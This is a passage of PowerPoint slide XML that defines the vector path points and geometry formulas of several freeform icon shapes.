                  <a:lnTo>
                    <a:pt x="2194" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3969" y="3040"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3669" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="3338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="3338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766" y="3338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="3338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868" y="1837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="1837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="1537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="1537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="1837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="1837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="3040"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7202" y="1002"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6499" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7202" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7202" y="1002"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2766" y="2435"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2168" y="2435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766" y="2435"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3066" y="2435"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3066" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="2435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="243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1" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3434492" y="2177449"/>
              <a:ext cx="1167509" cy="977676"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4688 w 7403"/>
                <a:gd name="T1" fmla="*/ 2237 h 6201"/>
                <a:gd name="T2" fmla="*/ 4709 w 7403"/>
                <a:gd name="T3" fmla="*/ 2200 h 6201"/>
                <a:gd name="T4" fmla="*/ 4673 w 7403"/>
                <a:gd name="T5" fmla="*/ 2163 h 6201"/>
                <a:gd name="T6" fmla="*/ 4289 w 7403"/>
                <a:gd name="T7" fmla="*/ 2174 h 6201"/>
                <a:gd name="T8" fmla="*/ 4284 w 7403"/>
                <a:gd name="T9" fmla="*/ 2216 h 6201"/>
                <a:gd name="T10" fmla="*/ 4494 w 7403"/>
                <a:gd name="T11" fmla="*/ 4274 h 6201"/>
                <a:gd name="T12" fmla="*/ 4394 w 7403"/>
                <a:gd name="T13" fmla="*/ 4305 h 6201"/>
                <a:gd name="T14" fmla="*/ 4332 w 7403"/>
                <a:gd name="T15" fmla="*/ 4384 h 6201"/>
                <a:gd name="T16" fmla="*/ 4321 w 7403"/>
                <a:gd name="T17" fmla="*/ 4489 h 6201"/>
                <a:gd name="T18" fmla="*/ 4368 w 7403"/>
                <a:gd name="T19" fmla="*/ 4578 h 6201"/>
                <a:gd name="T20" fmla="*/ 4494 w 7403"/>
                <a:gd name="T21" fmla="*/ 4631 h 6201"/>
                <a:gd name="T22" fmla="*/ 4594 w 7403"/>
                <a:gd name="T23" fmla="*/ 4599 h 6201"/>
                <a:gd name="T24" fmla="*/ 4662 w 7403"/>
                <a:gd name="T25" fmla="*/ 4520 h 6201"/>
                <a:gd name="T26" fmla="*/ 4673 w 7403"/>
                <a:gd name="T27" fmla="*/ 4416 h 6201"/>
                <a:gd name="T28" fmla="*/ 4620 w 7403"/>
                <a:gd name="T29" fmla="*/ 4326 h 6201"/>
                <a:gd name="T30" fmla="*/ 4494 w 7403"/>
                <a:gd name="T31" fmla="*/ 4274 h 6201"/>
                <a:gd name="T32" fmla="*/ 3895 w 7403"/>
                <a:gd name="T33" fmla="*/ 2457 h 6201"/>
                <a:gd name="T34" fmla="*/ 3854 w 7403"/>
                <a:gd name="T35" fmla="*/ 2525 h 6201"/>
                <a:gd name="T36" fmla="*/ 3874 w 7403"/>
                <a:gd name="T37" fmla="*/ 4142 h 6201"/>
                <a:gd name="T38" fmla="*/ 5066 w 7403"/>
                <a:gd name="T39" fmla="*/ 4163 h 6201"/>
                <a:gd name="T40" fmla="*/ 5119 w 7403"/>
                <a:gd name="T41" fmla="*/ 4142 h 6201"/>
                <a:gd name="T42" fmla="*/ 5140 w 7403"/>
                <a:gd name="T43" fmla="*/ 2525 h 6201"/>
                <a:gd name="T44" fmla="*/ 5093 w 7403"/>
                <a:gd name="T45" fmla="*/ 2457 h 6201"/>
                <a:gd name="T46" fmla="*/ 0 w 7403"/>
                <a:gd name="T47" fmla="*/ 6200 h 6201"/>
                <a:gd name="T48" fmla="*/ 5240 w 7403"/>
                <a:gd name="T49" fmla="*/ 5985 h 6201"/>
                <a:gd name="T50" fmla="*/ 5350 w 7403"/>
                <a:gd name="T51" fmla="*/ 5571 h 6201"/>
                <a:gd name="T52" fmla="*/ 5528 w 7403"/>
                <a:gd name="T53" fmla="*/ 5192 h 6201"/>
                <a:gd name="T54" fmla="*/ 5765 w 7403"/>
                <a:gd name="T55" fmla="*/ 4857 h 6201"/>
                <a:gd name="T56" fmla="*/ 6059 w 7403"/>
                <a:gd name="T57" fmla="*/ 4563 h 6201"/>
                <a:gd name="T58" fmla="*/ 6394 w 7403"/>
                <a:gd name="T59" fmla="*/ 4326 h 6201"/>
                <a:gd name="T60" fmla="*/ 6773 w 7403"/>
                <a:gd name="T61" fmla="*/ 4148 h 6201"/>
                <a:gd name="T62" fmla="*/ 7187 w 7403"/>
                <a:gd name="T63" fmla="*/ 4038 h 6201"/>
                <a:gd name="T64" fmla="*/ 7402 w 7403"/>
                <a:gd name="T65" fmla="*/ 0 h 6201"/>
                <a:gd name="T66" fmla="*/ 6316 w 7403"/>
                <a:gd name="T67" fmla="*/ 127 h 6201"/>
                <a:gd name="T68" fmla="*/ 5292 w 7403"/>
                <a:gd name="T69" fmla="*/ 425 h 6201"/>
                <a:gd name="T70" fmla="*/ 4352 w 7403"/>
                <a:gd name="T71" fmla="*/ 882 h 6201"/>
                <a:gd name="T72" fmla="*/ 3502 w 7403"/>
                <a:gd name="T73" fmla="*/ 1486 h 6201"/>
                <a:gd name="T74" fmla="*/ 2762 w 7403"/>
                <a:gd name="T75" fmla="*/ 2211 h 6201"/>
                <a:gd name="T76" fmla="*/ 2147 w 7403"/>
                <a:gd name="T77" fmla="*/ 3050 h 6201"/>
                <a:gd name="T78" fmla="*/ 1670 w 7403"/>
                <a:gd name="T79" fmla="*/ 3985 h 6201"/>
                <a:gd name="T80" fmla="*/ 1355 w 7403"/>
                <a:gd name="T81" fmla="*/ 4998 h 6201"/>
                <a:gd name="T82" fmla="*/ 200 w 7403"/>
                <a:gd name="T83" fmla="*/ 6001 h 6201"/>
                <a:gd name="T84" fmla="*/ 5334 w 7403"/>
                <a:gd name="T85" fmla="*/ 4563 h 6201"/>
                <a:gd name="T86" fmla="*/ 5224 w 7403"/>
                <a:gd name="T87" fmla="*/ 4689 h 6201"/>
                <a:gd name="T88" fmla="*/ 3927 w 7403"/>
                <a:gd name="T89" fmla="*/ 4736 h 6201"/>
                <a:gd name="T90" fmla="*/ 3770 w 7403"/>
                <a:gd name="T91" fmla="*/ 4689 h 6201"/>
                <a:gd name="T92" fmla="*/ 3659 w 7403"/>
                <a:gd name="T93" fmla="*/ 4563 h 6201"/>
                <a:gd name="T94" fmla="*/ 3638 w 7403"/>
                <a:gd name="T95" fmla="*/ 2163 h 6201"/>
                <a:gd name="T96" fmla="*/ 3722 w 7403"/>
                <a:gd name="T97" fmla="*/ 1964 h 6201"/>
                <a:gd name="T98" fmla="*/ 3869 w 7403"/>
                <a:gd name="T99" fmla="*/ 1885 h 6201"/>
                <a:gd name="T100" fmla="*/ 5124 w 7403"/>
                <a:gd name="T101" fmla="*/ 1885 h 6201"/>
                <a:gd name="T102" fmla="*/ 5271 w 7403"/>
                <a:gd name="T103" fmla="*/ 1964 h 6201"/>
                <a:gd name="T104" fmla="*/ 5355 w 7403"/>
                <a:gd name="T105" fmla="*/ 2163 h 6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403" h="6201">
                  <a:moveTo>
                    <a:pt x="4315" y="2237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4688" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4704" y="2226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4704" y="2174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4688" y="2168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300" y="2168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="2174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4284" y="2184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4284" y="2216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="2226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2237"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4494" y="4274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4426" y="4284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4394" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4347" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4321" y="4416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4321" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332" y="4520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4347" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4394" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4426" y="4615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457" y="4626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4531" y="4626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4562" y="4615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4594" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4646" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="4520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4646" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4594" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4562" y="4284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4531" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4274"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5066" y="2452"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3927" y="2452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="2452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859" y="2494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859" y="4122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="4158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5093" y="4158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="4122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="2494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5093" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="2452"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1355" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="6090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5240" y="5985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5261" y="5880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5313" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="5571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5387" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5428" y="5381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5476" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5528" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5581" y="5104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5638" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5701" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5765" y="4857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5833" y="4778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5906" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6059" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6137" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6221" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6306" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6394" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6489" y="4274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6678" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6773" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6877" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7082" y="4059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7187" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7292" y="4022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7124" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6851" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6316" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6053" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5796" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5544" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5292" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5050" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4809" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4352" y="882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4127" y="1019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="1166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3701" y="1323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3502" y="1486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="1654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="1833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2935" y="2016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762" y="2211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2594" y="2410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436" y="2620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2289" y="2830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="3050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011" y="3277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774" y="3744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491" y="4484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417" y="4741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="4998"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="200" y="6001"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200" y="5198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903" y="5602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="6001"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5355" y="4452"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5355" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="4510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5308" y="4610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="4689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5177" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5124" y="4730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3770" y="4689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685" y="4610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3644" y="4510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3644" y="2111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659" y="2058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3770" y="1927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817" y="1901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="1885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5124" y="1885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5177" y="1901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="1927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5308" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="2058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="2111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="445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62" name="Freeform 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4318294" y="2871418"/>
              <a:ext cx="630692" cy="630691"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1895 w 4000"/>
                <a:gd name="T1" fmla="*/ 5 h 4000"/>
                <a:gd name="T2" fmla="*/ 1596 w 4000"/>
                <a:gd name="T3" fmla="*/ 42 h 4000"/>
                <a:gd name="T4" fmla="*/ 1312 w 4000"/>
                <a:gd name="T5" fmla="*/ 120 h 4000"/>
                <a:gd name="T6" fmla="*/ 1045 w 4000"/>
                <a:gd name="T7" fmla="*/ 241 h 4000"/>
                <a:gd name="T8" fmla="*/ 803 w 4000"/>
                <a:gd name="T9" fmla="*/ 399 h 4000"/>
                <a:gd name="T10" fmla="*/ 587 w 4000"/>
                <a:gd name="T11" fmla="*/ 587 h 4000"/>
                <a:gd name="T12" fmla="*/ 399 w 4000"/>
                <a:gd name="T13" fmla="*/ 803 h 4000"/>
                <a:gd name="T14" fmla="*/ 241 w 4000"/>
                <a:gd name="T15" fmla="*/ 1045 h 4000"/>
                <a:gd name="T16" fmla="*/ 120 w 4000"/>
                <a:gd name="T17" fmla="*/ 1312 h 4000"/>
                <a:gd name="T18" fmla="*/ 42 w 4000"/>
                <a:gd name="T19" fmla="*/ 1596 h 4000"/>
                <a:gd name="T20" fmla="*/ 5 w 4000"/>
                <a:gd name="T21" fmla="*/ 1895 h 4000"/>
                <a:gd name="T22" fmla="*/ 5 w 4000"/>
                <a:gd name="T23" fmla="*/ 2104 h 4000"/>
                <a:gd name="T24" fmla="*/ 42 w 4000"/>
                <a:gd name="T25" fmla="*/ 2403 h 4000"/>
                <a:gd name="T26" fmla="*/ 120 w 4000"/>
                <a:gd name="T27" fmla="*/ 2687 h 4000"/>
                <a:gd name="T28" fmla="*/ 241 w 4000"/>
                <a:gd name="T29" fmla="*/ 2954 h 4000"/>
                <a:gd name="T30" fmla="*/ 399 w 4000"/>
                <a:gd name="T31" fmla="*/ 3196 h 4000"/>
